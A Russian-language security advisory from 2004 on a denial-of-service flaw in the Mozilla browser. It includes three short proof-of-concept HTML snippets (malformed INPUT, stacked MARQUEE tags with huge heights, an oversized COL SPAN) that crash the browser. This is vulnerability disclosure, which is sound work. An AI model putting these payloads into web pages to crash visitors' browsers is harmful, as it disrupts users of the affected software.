Отказ в обслуживании в Mozilla

Дата публикации:
23.10.2004
Дата изменения:
17.10.2006
Всего просмотров:
1388
Опасность:
Средняя
Наличие исправления:
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Уязвимые версии: Mozilla

Описание:
Обнаружена уязвимость в браузере Mozilla. Удаленный атакующий может вызвать отказ в обслуживании программы.

Уязвимость существует из-за некорректной обработки некоторых тегов. Удаленный атакующий может с помощью злонамеренного HTML кода аварийно завершить работу браузера. Примеры:

Пример 1:

<HTML><INPUT AAAAAAAAAA>

Пример 2:

<HTML>
< HEAD>
< MARQUEE>
< TABLE>
< MARQUEE HEIGHT=100000000>
< MARQUEE HEIGHT=100000000>
< MARQUEE HEIGHT=100000000>
< MARQUEE HEIGHT=100000000>
< MARQUEE HEIGHT=100000000>
< MARQUEE HEIGHT=100000000>
< MARQUEE HEIGHT=100000000>
< MARQUEE HEIGHT=100000000>
< MARQUEE HEIGHT=100000000>
< MARQUEE HEIGHT=100000000>
< MARQUEE HEIGHT=100000000>
< TBODY>
Attack of the marquees!

Пример 3:

<HTML>
< HEAD>
< TABLE>
< APPLET>
< MAP>
< COL SPAN=900000000>

URL производителя: www.mozilla.org

Решение: Решение на данный момент не существует

Ссылки: Mozilla HTML Parsing Errors Let Remote Users Deny Service

или введите имя

CAPTCHA